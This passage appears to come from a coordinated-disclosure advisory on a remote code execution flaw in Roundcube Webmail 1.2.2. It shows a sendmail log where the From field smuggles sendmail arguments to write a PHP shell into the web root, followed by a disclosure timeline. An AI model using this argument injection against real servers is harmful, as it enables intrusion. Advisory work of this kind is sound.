04731 <<< X-PHP-Originating-Script: 1000:rcube.php
04731 <<< MIME-Version: 1.0
04731 <<< Content-Type: text/plain; charset=US-ASCII;
04731 <<<  format=flowed
04731 <<< Content-Transfer-Encoding: 7bit
04731 <<< Date: So, 20 Nov 2016 04:02:52 +0100
04731 <<< From: example@example.com -OQueueDirectory=/tmp
04731 <<<  -X/var/www/html/rce.php
04731 <<< Message-ID: <390a0c6379024872a7f0310cdea24900@localhost>
04731 <<< X-Sender: example@example.com -OQueueDirectory=/tmp
04731 <<<  -X/var/www/html/rce.php
04731 <<< User-Agent: Roundcube Webmail/1.2.2
04731 <<<
04731 <<< Funny e-mail message
04731 <<< [EOF]
********************************************************************************

Since the email data is unencoded, the subject parameter will be
reflected in plaintext which allows the injection of PHP tags into the
shell file.

Time Line
---------
* 2016/11/21: First contact with vendor
* 2016/11/28: Vendor agrees to coordinated disclosure
* 2016/11/28: Vendor releases updated version Roundcube 1.2.3